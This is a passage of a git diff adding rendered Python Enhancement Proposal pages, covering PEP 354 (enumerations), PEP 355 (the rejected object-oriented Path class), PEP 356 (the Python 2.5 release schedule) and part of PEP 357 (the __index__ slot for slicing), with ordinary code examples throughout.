An enumeration is an exclusive set of symbolic names bound to +arbitrary unique values. Values within an enumeration can be iterated +and compared, but the values have no inherent relationship to values +outside the enumeration.

+
+
+

Motivation

+

The properties of an enumeration are useful for defining an immutable, +related set of constant values that have a defined sequence but no +inherent semantic meaning. Classic examples are days of the week +(Sunday through Saturday) and school assessment grades (‘A’ through +‘D’, and ‘F’). Other examples include error status values and states +within a defined process.

+

It is possible to simply define a sequence of values of some other +basic type, such as int or str, to represent discrete +arbitrary values. However, an enumeration ensures that such values +are distinct from any others, and that operations without meaning +(“Wednesday times two”) are not defined for these values.

+
+
+

Specification

+

An enumerated type is created from a sequence of arguments to the +type’s constructor:

+
>>> Weekdays = enum('sun', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat')
+>>> Grades = enum('A', 'B', 'C', 'D', 'F')
+
+
+

Enumerations with no values are meaningless. The exception +EnumEmptyError is raised if the constructor is called with no +value arguments.

+

The values are bound to attributes of the new enumeration object:

+
>>> today = Weekdays.mon
+
+
+

The values can be compared:

+
>>> if today == Weekdays.fri:
+...     print "Get ready for the weekend"
+
+
+

Values within an enumeration cannot be meaningfully compared except +with values from the same enumeration. The comparison operation +functions return NotImplemented [1] when a +value from an enumeration is compared against any value not from the +same enumeration or of a different type:

+
>>> gym_night = Weekdays.wed
+>>> gym_night.__cmp__(Weekdays.mon)
+1
+>>> gym_night.__cmp__(Weekdays.wed)
+0
+>>> gym_night.__cmp__(Weekdays.fri)
+-1
+>>> gym_night.__cmp__(23)
+NotImplemented
+>>> gym_night.__cmp__("wed")
+NotImplemented
+>>> gym_night.__cmp__(Grades.B)
+NotImplemented
+
+
+

This allows the operation to succeed, evaluating to a boolean value:

+
>>> gym_night = Weekdays.wed
+>>> gym_night < Weekdays.mon
+False
+>>> gym_night < Weekdays.wed
+False
+>>> gym_night < Weekdays.fri
+True
+>>> gym_night < 23
+False
+>>> gym_night > 23
+True
+>>> gym_night > "wed"
+True
+>>> gym_night > Grades.B
+True
+
+
+

Coercing a value from an enumeration to a str results in the +string that was specified for that value when constructing the +enumeration:

+
>>> gym_night = Weekdays.wed
+>>> str(gym_night)
+'wed'
+
+
+

The sequence index of each value from an enumeration is exported as an +integer via that value’s index attribute:

+
>>> gym_night = Weekdays.wed
+>>> gym_night.index
+3
+
+
+

An enumeration can be iterated, returning its values in the sequence +they were specified when the enumeration was created:

+
>>> print [str(day) for day in Weekdays]
+['sun', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat']
+
+
+

Values from an enumeration are hashable, and can be used as dict +keys:

+
>>> plans = {}
+>>> plans[Weekdays.sat] = "Feed the horse"
+
+
+

The normal usage of enumerations is to provide a set of possible +values for a data type, which can then be used to map to other +information about the values:

+
>>> for report_grade in Grades:
+...     report_students[report_grade] = \
+...         [s for s in students if s.grade == report_grade]
+
+
+
+
+

Rationale – Other designs considered

+
+

All in one class

+

Some implementations have the enumeration and its values all as +attributes of a single object or class.

+

This PEP specifies a design where the enumeration is a container, and +the values are simple comparables. It was felt that attempting to +place all the properties of enumeration within a single class +complicates the design without apparent benefit.

+
+
+

Metaclass for creating enumeration classes

+

The enumerations specified in this PEP are instances of an enum +type. Some alternative designs implement each enumeration as its own +class, and a metaclass to define common properties of all +enumerations.

+

One motivation for having a class (rather than an instance) for each +enumeration is to allow subclasses of enumerations, extending and +altering an existing enumeration. A class, though, implies that +instances of that class will be created; it is difficult to imagine +what it means to have separate instances of a “days of the week” +class, where each instance contains all days. This usually leads to +having each class follow the Singleton pattern, further complicating +the design.

+

In contrast, this PEP specifies enumerations that are not expected to +be extended or modified. It is, of course, possible to create a new +enumeration from the string values of an existing one, or even +subclass the enum type if desired.

+
+ +
+

Hiding attributes of enumerated values

+

A previous design had the enumerated values hiding as much as possible +about their implementation, to the point of not exporting the string +key and sequence index.

+

The design in this PEP acknowledges that programs will often find it +convenient to know the enumerated value’s enumeration type, sequence +index, and string key specified for the value. These are exported by +the enumerated value as attributes.

+
+
+
+

Implementation

+

This design is based partly on a recipe [2] from the +Python Cookbook.

+

The PyPI package enum [3] provides a Python +implementation of the data types described in this PEP.
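To make the described semantics concrete, here is a minimal runnable sketch written for modern Python 3 (so it is neither the PyPI package nor the cookbook recipe; only EnumEmptyError and the index/str behaviour come from the PEP, the rest is illustrative):

class EnumEmptyError(ValueError):
    """Raised when enum() is called with no value names (per the PEP)."""

class EnumValue:
    def __init__(self, enumtype, index, key):
        self._enumtype, self.index, self.key = enumtype, index, key

    def __str__(self):
        return self.key

    def __hash__(self):
        return hash((id(self._enumtype), self.index))

    def __eq__(self, other):
        if isinstance(other, EnumValue) and other._enumtype is self._enumtype:
            return self.index == other.index
        return NotImplemented  # values from other enumerations don't compare

    def __lt__(self, other):
        # Note: the PEP's Python 2 examples let cross-type ordering evaluate
        # to a boolean; under Python 3 that raises TypeError instead.
        if isinstance(other, EnumValue) and other._enumtype is self._enumtype:
            return self.index < other.index
        return NotImplemented

class enum:
    def __init__(self, *keys):
        if not keys:
            raise EnumEmptyError('enumerations need at least one value')
        self._values = tuple(EnumValue(self, i, k) for i, k in enumerate(keys))
        for value in self._values:
            setattr(self, value.key, value)

    def __iter__(self):
        return iter(self._values)

Weekdays = enum('sun', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat')
print(str(Weekdays.wed), Weekdays.wed.index)   # wed 3
print(Weekdays.mon < Weekdays.fri)             # True
print([str(day) for day in Weekdays])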

+
+
+

References and Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0354.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0355/index.html b/pep-0355/index.html new file mode 100644 index 00000000000..76543f320bb --- /dev/null +++ b/pep-0355/index.html @@ -0,0 +1,796 @@ + + + + + + + + PEP 355 – Path - Object oriented filesystem paths | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 355 – Path - Object oriented filesystem paths

+
+
Author:
+
Björn Lindqvist <bjourne at gmail.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
24-Jan-2006
+
Python-Version:
+
2.5
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP has been rejected (in this form). The proposed path class +is the ultimate kitchen sink; but the notion that it’s better to +implement all functionality that uses a path as a method on a single +class is an anti-pattern. (E.g. why not open()? Or execfile()?) +Subclassing from str is a particularly bad idea; many string +operations make no sense when applied to a path. This PEP has +lingered, and while the discussion flares up from time to time, +it’s time to put this PEP out of its misery. A less far-fetched +proposal might be more palatable.

+
+
+

Abstract

+

This PEP describes a new class, Path, to be added to the os +module, for handling paths in an object oriented fashion. The +“weak” deprecation of various related functions is also discussed +and recommended.

+
+
+

Background

+

The ideas expressed in this PEP are not recent, but have been +debated in the Python community for many years. Many have felt +that the API for manipulating file paths as offered in the os.path +module is inadequate. The first proposal for a Path object was +raised by Just van Rossum on python-dev in 2001 [2]. In 2003, +Jason Orendorff released version 1.0 of the “path module” which +was the first public implementation that used objects to represent +paths [3].

+

The path module quickly became very popular and numerous attempts +were made to get the path module included in the Python standard +library; [4], [5], [6], [7].

+

This PEP summarizes the ideas and suggestions people have +expressed about the path module and proposes that a modified +version should be included in the standard library.

+
+
+

Motivation

+

Dealing with filesystem paths is a common task in any programming +language, and very common in a high-level language like Python. +Good support for this task is needed, because:

+
  • Almost every program uses paths to access files. It makes sense that a task that is so often performed should be as intuitive and as easy to perform as possible.
  • It makes Python an even better replacement language for over-complicated shell scripts.
+

Currently, Python has a large number of different functions +scattered over half a dozen modules for handling paths. This +makes it hard for newbies and experienced developers to choose +the right method.

+

The Path class provides the following enhancements over the +current common practice:

+
    +
  • One “unified” object provides all functionality from previous +functions.
  • +
  • Subclassability - the Path object can be extended to support +paths other than filesystem paths. The programmer does not need +to learn a new API, but can reuse their knowledge of Path +to deal with the extended class.
  • +
  • With all related functionality in one place, the right approach +is easier to learn as one does not have to hunt through many +different modules for the right functions.
  • +
  • Python is an object oriented language. Just as files, +datetimes and sockets are objects, so are paths; they are not +merely strings to be passed to functions. Path objects are an +inherently pythonic idea.
  • +
  • Path takes advantage of properties. Properties make for more +readable code:
    if imgpath.ext == '.jpg':
    +    jpegdecode(imgpath)
    +
    +
    +

    Is better than:

    +
    if os.path.splitext(imgpath)[1] == '.jpg':
    +    jpegdecode(imgpath)
    +
    +
    +
  • +
+
+
+

Rationale

+

The following points summarize the design:

+
    +
  • Path extends from string, therefore all code which expects +string pathnames need not be modified and no existing code will +break.
  • +
  • A Path object can be created either by using the classmethod +Path.cwd, by instantiating the class with a string representing +a path, or by using the default constructor, which is equivalent +to Path(".") (see the sketch after this list).
  • +
  • Path provides common pathname manipulation, pattern expansion, +pattern matching and other high-level file operations including +copying. Basically Path provides everything path-related except +the manipulation of file contents, for which file objects are +better suited.
  • +
  • Platform incompatibilities are dealt with by not instantiating +system-specific methods.
  • +
+
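A short sketch of the construction possibilities just listed, using the from path import Path spelling adopted later in this PEP:
from path import Path
+
+p1 = Path.cwd()          # classmethod: the current working directory
+p2 = Path("/usr/local")  # instantiating with a string representing a path
+p3 = Path()              # default constructor, equivalent to Path(".")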
+
+

Specification

+

This class defines the following public interface (docstrings have +been extracted from the reference implementation, and shortened +for brevity; see the reference implementation for more detail):

+
class Path(str):
+
+    # Special Python methods:
+    def __new__(cls, *args) => Path
+        """
+        Creates a new path object concatenating the *args.  *args
+        may only contain Path objects or strings.  If *args is
+        empty, Path(os.curdir) is created.
+        """
+    def __repr__(self): ...
+    def __add__(self, more): ...
+    def __radd__(self, other): ...
+
+    # Alternative constructor.
+    def cwd(cls): ...
+
+    # Operations on path strings:
+    def abspath(self) => Path
+        """Returns the absolute path of self as a new Path object."""
+    def normcase(self): ...
+    def normpath(self): ...
+    def realpath(self): ...
+    def expanduser(self): ...
+    def expandvars(self): ...
+    def basename(self): ...
+    def expand(self): ...
+    def splitpath(self) => (Path, str)
+        """p.splitpath() -> Return (p.parent, p.name)."""
+    def stripext(self) => Path
+        """p.stripext() -> Remove one file extension from the path."""
+    def splitunc(self): ...  # See footnote [1]
+    def splitall(self): ...
+    def relpath(self): ...
+    def relpathto(self, dest): ...
+
+    # Properties about the path:
+    parent => Path
+        """This Path's parent directory as a new path object."""
+    name => str
+        """The name of this file or directory without the full path."""
+    ext => str
+        """
+        The file extension or an empty string if Path refers to a
+        file without an extension or a directory.
+        """
+    drive => str
+        """
+        The drive specifier.  Always empty on systems that don't
+        use drive specifiers.
+        """
+    namebase => str
+        """
+        The same as path.name, but with one file extension
+        stripped off.
+        """
+    uncshare[1]
+
+    # Operations that return lists of paths:
+    def listdir(self, pattern = None): ...
+    def dirs(self, pattern = None): ...
+    def files(self, pattern = None): ...
+    def walk(self, pattern = None): ...
+    def walkdirs(self, pattern = None): ...
+    def walkfiles(self, pattern = None): ...
+    def match(self, pattern) => bool
+        """Returns True if self.name matches the given pattern."""
+
+    def matchcase(self, pattern) => bool
+        """
+        Like match() but is guaranteed to be case sensitive even
+        on platforms with case insensitive filesystems.
+        """
+    def glob(self, pattern): ...
+
+    # Methods for retrieving information about the filesystem
+    # path:
+    def exists(self): ...
+    def isabs(self): ...
+    def isdir(self): ...
+    def isfile(self): ...
+    def islink(self): ...
+    def ismount(self): ...
+    def samefile(self, other): ...  # See footnote [1]
+    def atime(self): ...
+        """Last access time of the file."""
+    def mtime(self): ...
+        """Last-modified time of the file."""
+    def ctime(self): ...
+        """
+        Return the system's ctime which, on some systems (like
+        Unix) is the time of the last change, and, on others (like
+        Windows), is the creation time for path.
+        """
+    def size(self): ...
+    def access(self, mode): ...  # See footnote [1]
+    def stat(self): ...
+    def lstat(self): ...
+    def statvfs(self): ...  # See footnote [1]
+    def pathconf(self, name): ...  # See footnote [1]
+
+    # Methods for manipulating information about the filesystem
+    # path.
+    def utime(self, times) => None
+    def chmod(self, mode) => None
+    def chown(self, uid, gid) => None # See footnote [1]
+    def rename(self, new) => None
+    def renames(self, new) => None
+
+    # Create/delete operations on directories
+    def mkdir(self, mode = 0777): ...
+    def makedirs(self, mode = 0777): ...
+    def rmdir(self): ...
+    def removedirs(self): ...
+
+    # Modifying operations on files
+    def touch(self): ...
+    def remove(self): ...
+    def unlink(self): ...
+
+    # Modifying operations on links
+    def link(self, newpath): ...
+    def symlink(self, newlink): ...
+    def readlink(self): ...
+    def readlinkabs(self): ...
+
+    # High-level functions from shutil
+    def copyfile(self, dst): ...
+    def copymode(self, dst): ...
+    def copystat(self, dst): ...
+    def copy(self, dst): ...
+    def copy2(self, dst): ...
+    def copytree(self, dst, symlinks = True): ...
+    def move(self, dst): ...
+    def rmtree(self, ignore_errors = False, onerror = None): ...
+
+    # Special stuff from os
+    def chroot(self): ...  # See footnote [1]
+    def startfile(self): ...  # See footnote [1]
+
+
+
+
+

Replacing older functions with the Path class

+

In this section, “a ==> b” means that b can be used as a +replacement for a.

+

In the following examples, we assume that the Path class is +imported with from path import Path.

+
    +
  • Replacing os.path.join:
    os.path.join(os.getcwd(), "foobar")
    +==>
    +Path(Path.cwd(), "foobar")
    +
    +os.path.join("foo", "bar", "baz")
    +==>
    +Path("foo", "bar", "baz")
    +
    +
    +
  • +
  • Replacing os.path.splitext:
    fname = "Python2.4.tar.gz"
    +os.path.splitext(fname)[1]
    +==>
    +fname = Path("Python2.4.tar.gz")
    +fname.ext
    +
    +
    +

    Or if you want both parts:

    +
    fname = "Python2.4.tar.gz"
    +base, ext = os.path.splitext(fname)
    +==>
    +fname = Path("Python2.4.tar.gz")
+base, ext = fname.namebase, fname.ext
    +
    +
    +
  • +
  • Replacing glob.glob:
    lib_dir = "/lib"
+libs = glob.glob(os.path.join(lib_dir, "*.so"))
    +==>
    +lib_dir = Path("/lib")
    +libs = lib_dir.files("*.so")
    +
    +
    +
  • +
+
+
+

Deprecations

+

Introducing this module to the standard library introduces a need +for the “weak” deprecation of a number of existing modules and +functions. These modules and functions are so widely used that +they cannot be truly deprecated, as in generating +DeprecationWarning. Here “weak deprecation” means notes in the +documentation only.

+

The table below lists the existing functionality that should be +deprecated.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Path method/propertyDeprecates function
normcase()os.path.normcase()
normpath()os.path.normpath()
realpath()os.path.realpath()
expanduser()os.path.expanduser()
expandvars()os.path.expandvars()
parentos.path.dirname()
nameos.path.basename()
splitpath()os.path.split()
driveos.path.splitdrive()
extos.path.splitext()
splitunc()os.path.splitunc()
__new__()os.path.join(), os.curdir
listdir()os.listdir() [fnmatch.filter()]
match()fnmatch.fnmatch()
matchcase()fnmatch.fnmatchcase()
glob()glob.glob()
exists()os.path.exists()
isabs()os.path.isabs()
isdir()os.path.isdir()
isfile()os.path.isfile()
islink()os.path.islink()
ismount()os.path.ismount()
samefile()os.path.samefile()
atime()os.path.getatime()
ctime()os.path.getctime()
mtime()os.path.getmtime()
size()os.path.getsize()
cwd()os.getcwd()
access()os.access()
stat()os.stat()
lstat()os.lstat()
statvfs()os.statvfs()
pathconf()os.pathconf()
utime()os.utime()
chmod()os.chmod()
chown()os.chown()
rename()os.rename()
renames()os.renames()
mkdir()os.mkdir()
makedirs()os.makedirs()
rmdir()os.rmdir()
removedirs()os.removedirs()
remove()os.remove()
unlink()os.unlink()
link()os.link()
symlink()os.symlink()
readlink()os.readlink()
chroot()os.chroot()
startfile()os.startfile()
copyfile()shutil.copyfile()
copymode()shutil.copymode()
copystat()shutil.copystat()
copy()shutil.copy()
copy2()shutil.copy2()
copytree()shutil.copytree()
move()shutil.move()
rmtree()shutil.rmtree()
+

The Path class deprecates the whole of os.path, shutil, fnmatch +and glob. A big chunk of os is also deprecated.

+
+
+

Closed Issues

+

A number of contentious issues have been resolved since this PEP +first appeared on python-dev:

+
    +
  • The __div__() method was removed. Overloading the / (division) +operator may be “too much magic” and make path concatenation +appear to be division. The method can always be re-added later +if the BDFL so desires. In its place, __new__() got an *args +argument that accepts both Path and string objects. The *args +are concatenated with os.path.join() which is used to construct +the Path object. These changes obsoleted the problematic +joinpath() method which was removed.
  • +
  • The methods and the properties getatime()/atime, +getctime()/ctime, getmtime()/mtime and getsize()/size duplicated +each other. These methods and properties have been merged to +atime(), ctime(), mtime() and size(). The reason they are not +properties is that their values may change unexpectedly. The +following example is not guaranteed to always pass the assertion:
    p = Path("foobar")
    +s = p.size()
    +assert p.size() == s
    +
    +
    +
  • +
+
+
+

Open Issues

+

Some functionality of Jason Orendorff’s path module has been +omitted:

+
    +
  • Function for opening a path - better handled by the builtin +open().
  • +
  • Functions for reading and writing whole files - better handled +by file objects’ own read() and write() methods.
  • +
  • A chdir() function may be a worthy inclusion.
  • +
  • A deprecation schedule needs to be set up. How much +functionality should Path implement? How much of existing +functionality should it deprecate and when?
  • +
  • The name obviously has to be either “path” or “Path,” but where +should it live? In its own module or in os?
  • +
  • Due to Path subclassing either str or unicode, the following +non-magic, public methods are available on Path objects:
    capitalize(), center(), count(), decode(), encode(),
    +endswith(), expandtabs(), find(), index(), isalnum(),
    +isalpha(), isdigit(), islower(), isspace(), istitle(),
    +isupper(), join(), ljust(), lower(), lstrip(), replace(),
    +rfind(), rindex(), rjust(), rsplit(), rstrip(), split(),
    +splitlines(), startswith(), strip(), swapcase(), title(),
    +translate(), upper(), zfill()
    +
    +
    +

    On python-dev it has been argued whether this inheritance is +sane or not. Most of those debating said that most string +methods don’t make sense in the context of filesystem paths – +they are just dead weight. The other position, also argued on +python-dev, is that inheriting from string is very convenient +because it allows code to “just work” with Path objects without +having to be adapted for them.

    +

    One of the problems is that at the Python level, there is no way +to make an object “string-like enough,” so that it can be passed +to the builtin function open() (and other builtins expecting a +string or buffer), unless the object inherits from either str or +unicode. Therefore, to not inherit from string requires changes +in CPython’s core.

    +
  • +
+

The functions and modules that this new module is trying to +replace (os.path, shutil, fnmatch, glob and parts of os) are +expected to be available in future Python versions for a long +time, to preserve backwards compatibility.

+
+
+

Reference Implementation

+

Currently, the Path class is implemented as a thin wrapper around +the standard library modules fnmatch, glob, os, os.path and +shutil. The intention of this PEP is to move functionality from +the aforementioned modules to Path while they are being +deprecated.

+

For more detail and an implementation see:

+
+
+
+
+

Examples

+

In this section, “a ==> b” means that b can be used as a +replacement for a.

+
    +
  • Make all Python files in a directory executable:
    DIR = '/usr/home/guido/bin'
    +for f in os.listdir(DIR):
    +    if f.endswith('.py'):
    +        path = os.path.join(DIR, f)
    +        os.chmod(path, 0755)
    +==>
    +for f in Path('/usr/home/guido/bin').files("*.py"):
    +    f.chmod(0755)
    +
    +
    +
  • +
  • Delete emacs backup files:
    def delete_backups(arg, dirname, names):
    +    for name in names:
    +        if name.endswith('~'):
    +            os.remove(os.path.join(dirname, name))
    +os.path.walk(os.environ['HOME'], delete_backups, None)
    +==>
    +d = Path(os.environ['HOME'])
    +for f in d.walkfiles('*~'):
    +    f.remove()
    +
    +
    +
  • +
  • Finding the relative path to a file:
    b = Path('/users/peter/')
    +a = Path('/users/peter/synergy/tiki.txt')
    +a.relpathto(b)
    +
    +
    +
  • +
  • Splitting a path into directory and filename:
    os.path.split("/path/to/foo/bar.txt")
    +==>
    +Path("/path/to/foo/bar.txt").splitpath()
    +
    +
    +
  • +
  • List all Python scripts in the current directory tree:
    list(Path().walkfiles("*.py"))
    +
    +
    +
  • +
+
+
+

References and Footnotes

+

[1] Method is not guaranteed to be available on all platforms.

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0355.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0356/index.html b/pep-0356/index.html new file mode 100644 index 00000000000..96cf591767d --- /dev/null +++ b/pep-0356/index.html @@ -0,0 +1,297 @@ + + + + + + + + PEP 356 – Python 2.5 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 356 – Python 2.5 Release Schedule

+
+
Author:
+
Neal Norwitz, Guido van Rossum, Anthony Baxter
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
07-Feb-2006
+
Python-Version:
+
2.5
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 2.5. The schedule primarily concerns itself with PEP-sized +items. Small features may be added up to and including the first +beta release. Bugs may be fixed until the final release.

+

There will be at least two alpha releases, two beta releases, and +one release candidate. The release date is planned for +12 September 2006.

+
+
+

Release Manager

+
    +
  • Anthony Baxter has volunteered to be Release Manager.
  • +
  • Martin von Loewis is building the Windows installers,
  • +
  • Ronald Oussoren is building the Mac installers,
  • +
  • Fred Drake the doc packages and
  • +
  • Sean Reifschneider the RPMs.
  • +
+
+
+

Release Schedule

+
    +
  • alpha 1: April 5, 2006 [completed]
  • +
  • alpha 2: April 27, 2006 [completed]
  • +
  • beta 1: June 20, 2006 [completed]
  • +
  • beta 2: July 11, 2006 [completed]
  • +
  • beta 3: August 3, 2006 [completed]
  • +
  • rc 1: August 17, 2006 [completed]
  • +
  • rc 2: September 12, 2006 [completed]
  • +
  • final: September 19, 2006 [completed]
  • +
+
+
+

Completed features for 2.5

+
    +
  • PEP 308: Conditional Expressions
  • +
  • PEP 309: Partial Function Application
  • +
  • PEP 314: Metadata for Python Software Packages v1.1
  • +
  • PEP 328: Absolute/Relative Imports
  • +
  • PEP 338: Executing Modules as Scripts
  • +
  • PEP 341: Unified try-except/try-finally to try-except-finally
  • +
  • PEP 342: Coroutines via Enhanced Generators
  • +
  • PEP 343: The “with” Statement (still need updates in Doc/ref and for the +contextlib module)
  • +
  • PEP 352: Required Superclass for Exceptions
  • +
  • PEP 353: Using ssize_t as the index type
  • +
  • PEP 357: Allowing Any Object to be Used for Slicing
  • +
  • ASCII became the default coding
  • +
  • AST-based compiler
  • +
  • Access to C AST from Python through new _ast module
  • +
  • any()/all() builtin truth functions
  • +
+

New standard library modules:

+
    +
  • cProfile – suitable for profiling long running applications +with minimal overhead
  • +
  • ctypes – optional component of the windows installer
  • +
  • ElementTree and cElementTree – by Fredrik Lundh
  • +
  • hashlib – adds support for SHA-224, -256, -384, and -512 +(replaces old md5 and sha modules)
  • +
  • msilib – for creating MSI files and bdist_msi in distutils.
  • +
  • pysqlite
  • +
  • uuid
  • +
  • wsgiref
  • +
+

Other notable features:

+
    +
  • Added support for reading shadow passwords [1]
  • +
  • Added support for the Unicode 4.1 UCD
  • +
  • Added PEP 302 zipfile/__loader__ support to the following modules: +warnings, linecache, inspect, traceback, site, and +doctest
  • +
  • Added pybench Python benchmark suite – by Marc-Andre Lemburg
  • +
  • Add write support for mailboxes from the code in sandbox/mailbox. +(Owner: A.M. Kuchling. It would still be good if another person +would take a look at the new code.)
  • +
  • Support for building “fat” Mac binaries (Intel and PPC)
  • +
  • Add new icons for Windows with the new Python logo?
  • +
  • New utilities in functools to help write wrapper functions that +support naive introspection (e.g. having f.__name__ return +the original function name).
  • +
  • Upgrade pyexpat to use expat 2.0.
  • +
  • Python core now compiles cleanly with g++
  • +
+
+
+

Possible features for 2.5

+

Each feature below should be implemented prior to beta1 or +will require BDFL approval for inclusion in 2.5.

+
    +
  • Modules under consideration for inclusion:
  • +
  • Add new icons for MacOS and Unix with the new Python logo? +(Owner: ???) +MacOS: http://hcs.harvard.edu/~jrus/python/prettified-py-icons.png
  • +
  • Check the various bits of code in Demo/ all still work, update or +remove the ones that don’t. +(Owner: Anthony)
  • +
  • All modules in Modules/ should be updated to be ssize_t clean. +(Owner: Neal)
  • +
+
+
+

Deferred until 2.6

+
    +
  • bdist_deb in distutils package [2]
  • +
  • bdist_egg in distutils package
  • +
  • pure python pgen module +(Owner: Guido)
  • +
  • Remove the fpectl module?
  • +
  • Make everything in Modules/ build cleanly with g++
  • +
+
+
+

Open issues

+ +
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0356.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0357/index.html b/pep-0357/index.html new file mode 100644 index 00000000000..1efe8b02670 --- /dev/null +++ b/pep-0357/index.html @@ -0,0 +1,349 @@ + + + + + + + + PEP 357 – Allowing Any Object to be Used for Slicing | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 357 – Allowing Any Object to be Used for Slicing

+
+
Author:
+
Travis Oliphant <oliphant at ee.byu.edu>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
09-Feb-2006
+
Python-Version:
+
2.5
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes adding an nb_index slot in PyNumberMethods and an +__index__ special method so that arbitrary objects can be used +whenever integers are explicitly needed in Python, such as in slice +syntax (from which the slot gets its name).

+
+
+

Rationale

+

Currently integers and long integers play a special role in +slicing in that they are the only objects allowed in slice +syntax. In other words, if X is an object implementing the +sequence protocol, then X[obj1:obj2] is only valid if obj1 and +obj2 are both integers or long integers. There is no way for obj1 +and obj2 to tell Python that they could be reasonably used as +indexes into a sequence. This is an unnecessary limitation.

+

In NumPy, for example, there are 8 different integer scalars +corresponding to unsigned and signed integers of 8, 16, 32, and 64 +bits. These type-objects could reasonably be used as integers in +many places where Python expects true integers but cannot inherit from +the Python integer type because of incompatible memory layouts. +There should be some way to tell Python that an object can +behave like an integer.

+

It is not possible to use the nb_int (and __int__ special method) +for this purpose because that method is used to coerce objects +to integers. It would be inappropriate to allow every object that +can be coerced to an integer to be used as an integer everywhere +Python expects a true integer. For example, if __int__ were used +to convert an object to an integer in slicing, then float objects +would be allowed in slicing and x[3.2:5.8] would not raise an error +as it should.

+
+
+

Proposal

+

Add an nb_index slot to PyNumberMethods, and a corresponding +__index__ special method. Objects could define a function to +place in the nb_index slot that returns a Python integer +(either an int or a long). This integer can +then be appropriately converted to a Py_ssize_t value whenever +Python needs one such as in PySequence_GetSlice, +PySequence_SetSlice, and PySequence_DelSlice.
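At the Python level the effect can be sketched as follows; MyInt is a hypothetical stand-in for a type (such as a NumPy integer scalar) that cannot inherit from the Python integer type:
class MyInt(object):
+    def __init__(self, value):
+        self.value = value
+    def __index__(self):
+        # must return a true int (or long); Python calls this
+        # whenever slice syntax needs an integer index
+        return self.value
+
+seq = range(10)
+assert seq[MyInt(2):MyInt(5)] == [2, 3, 4]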

+
+
+

Specification

+
    +
  1. The nb_index slot will have the following signature:
    PyObject *index_func (PyObject *self)
    +
    +
    +

    The returned object must be a Python IntType or +Python LongType. NULL should be returned on +error with an appropriate error set.

    +
  2. +
  3. The __index__ special method will have the signature:
    def __index__(self):
    +    return obj
    +
    +
    +

    where obj must be either an int or a long.

    +
  4. +
  5. 3 new abstract C-API functions will be added
      +
    1. The first checks to see if the object supports the index +slot and if it is filled in.
      int PyIndex_Check(obj)
      +
      +
      +

      This will return true if the object defines the nb_index +slot.

      +
    2. +
    3. The second is a simple wrapper around the nb_index call that +raises PyExc_TypeError if the call is not available or if it +doesn’t return an int or long. Because the +PyIndex_Check is performed inside the PyNumber_Index call +you can call it directly and manage any error rather than +check for compatibility first.
      PyObject *PyNumber_Index (PyObject *obj)
      +
      +
      +
    4. +
    5. The third call helps deal with the common situation of +actually needing a Py_ssize_t value from the object to use for +indexing or other needs.
      Py_ssize_t PyNumber_AsSsize_t(PyObject *obj, PyObject *exc)
      +
      +
      +

      The function calls the nb_index slot of obj if it is +available and then converts the returned Python integer into +a Py_ssize_t value. If this goes well, then the value is +returned. The second argument allows control over what +happens if the integer returned from nb_index cannot fit +into a Py_ssize_t value.

      +

      If exc is NULL, then the returned value will be clipped to +PY_SSIZE_T_MAX or PY_SSIZE_T_MIN depending on whether the +nb_index slot of obj returned a positive or negative +integer. If exc is non-NULL, then it is the error object +that will be set to replace the PyExc_OverflowError that was +raised when the Python integer or long was converted to Py_ssize_t.

      +
    6. +
    +
  6. +
  7. A new operator.index(obj) function will be added that calls the +equivalent of obj.__index__() and raises an error if obj does not +implement the special method (see the sketch after this list).
  8. +
+
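A sketch of the intended operator.index() behaviour; the Rational class here is purely hypothetical:
import operator
+
+class Rational(object):
+    def __init__(self, num, den=1):
+        self.num, self.den = num, den
+    def __index__(self):
+        if self.num % self.den:
+            raise TypeError("not an integral value")
+        return self.num // self.den
+
+assert operator.index(Rational(6, 2)) == 3  # integral value: usable
+assert operator.index(7) == 7               # ints return themselves
+# operator.index(3.5) raises TypeError, because floats define
+# __int__ but, deliberately, not __index__.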
+
+

Implementation Plan

+
    +
  1. Add the nb_index slot in object.h and modify typeobject.c to +create the __index__ method
  2. +
  3. Change the ISINT macro in ceval.c to ISINDEX and alter it to +accommodate objects with the index slot defined.
  4. +
  5. Change the _PyEval_SliceIndex function to accommodate objects +with the index slot defined.
  6. +
  7. Change all builtin objects (e.g. lists) that use the as_mapping +slots for subscript access and use a special-check for integers to +check for the slot as well.
  8. +
  9. Add the nb_index slot to integers and long_integers +(which just return themselves)
  10. +
  11. Add PyNumber_Index C-API to return an integer from any +Python Object that has the nb_index slot.
  12. +
